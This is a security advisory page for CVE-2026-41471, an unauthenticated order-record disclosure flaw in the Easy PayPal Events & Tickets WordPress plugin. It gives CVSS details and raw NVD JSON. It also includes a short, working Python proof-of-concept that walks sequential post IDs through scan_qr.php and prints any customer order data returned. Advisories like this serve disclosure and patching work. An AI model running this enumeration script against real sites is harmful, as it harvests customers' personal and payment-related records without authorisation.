Security Vulnerability Report
CVE-2026-41471 CVSS 7.5 HIGH

CVE-2026-41471

Published: 2026-05-04 18:16:29
Last Modified: 2026-05-13 16:16:45

Description

The Easy PayPal Events & Tickets plugin for WordPress before version 1.4 contains an information disclosure vulnerability in the QR code scanning endpoint that allows unauthenticated attackers to enumerate and retrieve all customer order records. Attackers can iterate over sequential WordPress post IDs through the scan_qr.php endpoint to harvest the complete set of orders stored in the database without requiring authentication or prior knowledge of specific order identifiers.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Easy PayPal Events & Tickets < 1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of the vulnerable endpoint
# Replace 'target.com' with the actual victim domain
target_url = "http://target.com/wp-content/plugins/easy-paypal-events-tickets/scan_qr.php"

print("Starting ID enumeration...")

# Iterate through sequential WordPress Post IDs
for post_id in range(1, 2000):
    # Construct payload
    params = {'id': post_id}
    try:
        response = requests.get(target_url, params=params, timeout=5)
        # Check if response indicates valid order data
        # Adjust condition based on actual response structure
        if response.status_code == 200 and len(response.text) > 0:
            # Filter out empty or non-order responses if necessary
            print(f"[+] Data found for ID {post_id}:")
            print(response.text)
            print("-" * 40)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to server: {e}")
        break

print("Enumeration completed.")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41471", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:29.447", "lastModified": "2026-05-13T16:16:45.200", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Easy PayPal Events & Tickets plugin for WordPress before version 1.4 contain an information disclosure vulnerability in the QR code scanning endpoint that allows unauthenticated attackers to enumerate and retrieve all customer order records. Attackers can iterate over sequential WordPress post IDs through the scan_qr.php endpoint to harvest the complete set of orders stored in the database without requiring authentication or prior knowledge of specific order identifiers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://gist.github.com/4lec4st/9fd04b4bfadb3f7e388f61588f5f2564", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/easy-paypal-events-tickets/#developers", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/easy-paypal-events-tickets-information-disclosure-via-qr-code-endpoint", "source": "[email protected]"}]}}